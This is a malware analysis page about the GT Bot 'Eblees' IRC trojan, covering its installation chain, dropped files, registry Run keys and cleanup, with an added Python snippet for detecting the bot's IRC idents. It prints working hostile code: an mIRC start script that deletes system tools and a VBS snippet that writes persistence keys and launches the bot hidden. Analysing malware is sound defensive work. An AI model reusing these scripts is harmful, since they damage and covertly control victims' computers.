TrojanInfo.com
GT Bot IRC DDoS Trojan Information

GT Bot Eblees


This GT Bot Trojan installs all of its files into C:\WINDOWS\FONTS\Eblees with the exception of Jumping.exe which is installed to C:\WINDOWS\SYSTEM. When the hacker's victim executes the web download trojan, setuper.exe, it logs onto the hacker's web server and then downloads and executes Jailss.exe. Jailss.exe is installed to C:\WINDOWS\TEMP. It drops the GT Bot files, executes the newly created Jumping.exe, then deletes itself and exits.

Jumping.exe writes the VBS files and executes them; they in turn write the registry values and start the GT Bot in stealth mode, rendering it invisible to the computer user. Once the GT Bot has started, it loads a script which promptly deletes the created VBS files. Jumping.exe repeats this cycle every time it is executed.

This is a relatively destructive bot in that when it executes, it attempts to delete Windows files. One of the ways this routine is performed is with the mIRC script firstsys.com. The code excerpt is as follows:

on *:start:{
  if ($exists(C:\WINDOWS\netstat.exe) == $true) { /remove C:\WINDOWS\netstat.exe }
  if ($exists(C:\WINDOWS\regedit.exe) == $true) { /remove C:\WINDOWS\regedit.exe }
  if ($exists(Setsj.exe) == $true) { /remove Setsj.exe }
  remove $findfile(C:\,Klap.vbs,1)
  remove $findfile(C:\,Slap.vbs,1)
  .flush
  .adduser
  .identd on $rand(A,Z) $+ $read editsys.com $+ $rand(A,Z)
  nick Gh0st-[ $+ $r(1,1000) $+ $r(1,1000) $+ ]
  timerHidde 0 3 Hidde
  .check
  timercheck 0 30 .check
}

The "on *:start:" event instructs mIRC to execute all the commands between the curly braces { } when the script is initially loaded, and then every time mIRC is started thereafter. The code then checks whether netstat.exe, regedit.exe or Setsj.exe exist, and if so they are deleted as well. Newer versions of Windows will automatically replace some or all altered *.exe files. Setsj.exe is dropped by the GT Bot dropper and is a text file, not an actual application. While the script is executing these commands there is a lot of noticeable hard drive activity as it performs the search: the remove $findfile(C:\,Klap.vbs,1) and remove $findfile(C:\,Slap.vbs,1) commands waste time looking through every directory on the C:\ drive instead of searching the fixed C:\Windows path. Also, if your operating system is in a directory other than the default C:\Windows, or on another drive, this Trojan will create a folder on your C:\ drive named Windows, a directory called Fonts inside that, and inside that a folder called Eblees where it installs most of its binaries. A Fonts directory created by this Trojan will not have the same characteristics as the default Windows\Fonts folder, which displays only fonts; the files inside it will be completely visible in Windows Explorer.

The hacker has scripted this GT Bot to try to delete several important Windows files if it is discovered, or, if any of the specified files are discovered, to try to exit Windows, which in theory should render the computer useless. However, our tests showed that this does not work in most instances, and the System Restore feature in Windows ME and higher will easily return your computer to its pre-infected state. The files it attempts to remove are C:\Command.com, C:\WINDOWS\System.ini, C:\WINDOWS\Win.ini, C:\WINDOWS\Win.com and C:\WINDOWS\Rundll32.exe.

The hacker uses the "identd" command to turn on the ident function of mIRC. The first character of the ident is set to a random upper case letter, then the middle of the ident is read from the file editsys.com. This file contains a long list of names combined with a string command to randomize even that list. A small sample of this text file is as follows:

DeeM $+ $rand(a,z)
keekaT $+ $rand(a,z)
N $+ $rand(a,z) $+ uGhtY`
PiN $+ $rand(a,z) $+ Ya
Ru $+ $rand(a,z) $+ f1an
sa $+ $rand(a,z) $+ hf

The last character of the ident is also a random uppercase letter. So if the first line were read, it could produce an ident like DDeeMkZ or FDeeMpJ.
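As an added example (not code from the original page), the following Python turns editsys.com template lines into regular expressions so that idents produced by this bot can be recognised in IRC server logs, and it computes how many distinct idents a given file can yield. It uses the six lines quoted above as a constructed sample and assumes every ident is built as $rand(A,Z) $+ <line> $+ $rand(A,Z), as described.

```python
import re

# Constructed sample: the six editsys.com lines quoted on the page. Each line is a
# mIRC expression in which literal text is joined to $rand(x,y) tokens with $+.
EDITSYS_SAMPLE = """DeeM $+ $rand(a,z)
keekaT $+ $rand(a,z)
N $+ $rand(a,z) $+ uGhtY`
PiN $+ $rand(a,z) $+ Ya
Ru $+ $rand(a,z) $+ f1an
sa $+ $rand(a,z) $+ hf"""

RAND_TOKEN = re.compile(r"\$rand\(([A-Za-z]),([A-Za-z])\)")

def template_to_regex(line):
    """Compile one editsys.com line into a regex for the whole ident.

    The bot builds each ident as $rand(A,Z) $+ <line> $+ $rand(A,Z), so the
    pattern is anchored with one uppercase letter on either side (assumption).
    """
    parts = []
    for piece in line.split("$+"):
        piece = piece.strip()
        m = RAND_TOKEN.fullmatch(piece)
        # A $rand(x,y) token becomes a character class; everything else is literal.
        parts.append("[%s-%s]" % m.groups() if m else re.escape(piece))
    return re.compile("^[A-Z]" + "".join(parts) + "[A-Z]$")

def build_matchers(editsys_text):
    return [template_to_regex(l) for l in editsys_text.splitlines() if l.strip()]

def matching_template(ident, matchers):
    """Index of the template the ident was generated from, or -1 if none."""
    for i, rx in enumerate(matchers):
        if rx.match(ident):
            return i
    return -1

def ident_space(editsys_text):
    """Number of distinct idents the file can produce: 26 choices per $rand
    token, times 26 * 26 for the uppercase letters added around each line."""
    total = 0
    for line in editsys_text.splitlines():
        if line.strip():
            total += 26 ** len(RAND_TOKEN.findall(line)) * 26 * 26
    return total

if __name__ == "__main__":
    matchers = build_matchers(EDITSYS_SAMPLE)
    for ident in ("DDeeMkZ", "FDeeMpJ", "ANxuGhtY`Q", "alice"):
        print(ident, "->", matching_template(ident, matchers))
    print("possible idents from this sample:", ident_space(EDITSYS_SAMPLE))
```

Feeding the full 657-line editsys.com to ident_space would reproduce the 11,547,432 figure given in the file list below.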

The file Klap.vbs is a valid VBS file and contains the code:

Dim Q8HeLL
  Declares the variable Q8HeLL.
Set Q8HeLL = CreateObject("Wscript.shell")
  Creates a Windows Script Host shell object and assigns it to the variable Q8HeLL.
Q8HeLL.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Jumping", "C:\WINDOWS\System\Jumping.exe"
  Writes Jumping.exe to the Run key so that it executes on every boot.
Q8HeLL.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\KillersMe-", "C:\WINDOWS\KillerMe.exe"
  Writes this value to the registry; however, the file KillerMe.exe is never written to the hard drive. This could be a leftover from the hacker's testing phase of this GT Bot.
Q8HeLL.run "C:\WINDOWS\FONTS\Eblees\HStart.com -i C:\WINDOWS\FONTS\Eblees\SysStart.com",0,true
  Starts GT Bot Eblees using SysStart.com as the mirc.ini, preventing mIRC from writing the tell-tale mirc.ini to the folder. The "0" constant hides the application window; changing the 0 to 1 will reveal the mIRC client on your desktop.

The file Slap.vbs is a start command for the GT Bot similar to the one Klap.vbs uses, with the exception that it uses syshelp.com as the mirc.ini file instead of SysStart.com.

Dropper File
setuper.exe Size 2K Discovered October 22, 2002

Files and Folders Dropped
c:\WINDOWS\FONTS\Eblees\ - Folder
c:\WINDOWS\FONTS\Eblees\download\ - Folder, the default download directory created by mIRC
c:\WINDOWS\FONTS\Eblees\editsys.com Size: 18,738 bytes Text file referenced by firstsys.com, secondsys.com, syshelp.com and syslock.com. This file contains 657 idents, each combined with a random letter generator, giving 17,082 possible results. Add the two random letters before and after this and you get 11,547,432 possible idents.
c:\WINDOWS\FONTS\Eblees\firstsys.com Size: 26,703 bytes mIRC Script
c:\WINDOWS\FONTS\Eblees\HStart.com Size: 443,392 bytes mIRC 5.7
c:\WINDOWS\FONTS\Eblees\IServer.exe Size: 20 bytes Text file referenced by syslock.com, contains server information.
c:\WINDOWS\FONTS\Eblees\love.exe Size: 47 bytes Text file referenced by sysstart.com and syshelp.com
c:\WINDOWS\FONTS\Eblees\Msys.exe Size: 86 bytes Text file containing a web address and some text. The script syslock.com attempts to read from it to spam users on IRC channels. It deletes and rewrites the file each time it is called, using data read from a variable that is set in the file saysaass.exe.
c:\WINDOWS\FONTS\Eblees\saysaass.exe Size: 38 bytes Text file referenced by sysstart.com and syshelp.com, contains information for global variables used in these scripts, including server information and a web address
c:\WINDOWS\FONTS\Eblees\secondsys.com Size: 13,213 bytes mIRC Script
c:\WINDOWS\FONTS\Eblees\Setsj.exe Size: 30 bytes Text file referenced by secondsys.com and firstsys.com
c:\WINDOWS\FONTS\Eblees\syshelp.com Size: 3,002 bytes mirc.ini replacement file
c:\WINDOWS\FONTS\Eblees\syslock.com Size: 3,277 bytes mIRC Script
c:\WINDOWS\FONTS\Eblees\sysstart.com Size: 2,913 bytes mirc.ini file

Before you make any changes to the registry, it is recommended that you first make a backup.

This GT Bot attempts to delete regedit.exe. If that was successful on your machine, you will need to recover that file. On Windows 98 and 98SE run sfc from the Start menu. On Windows ME and higher you can simply run System Restore.

Registry Keys Added
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Jumping"
Type: REG_SZ
Data: C:\WINDOWS\System\Jumping.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "KillersMe-"
Type: REG_SZ
Data: C:\WINDOWS\KillerMe.exe

Registry Keys Changed

N/A
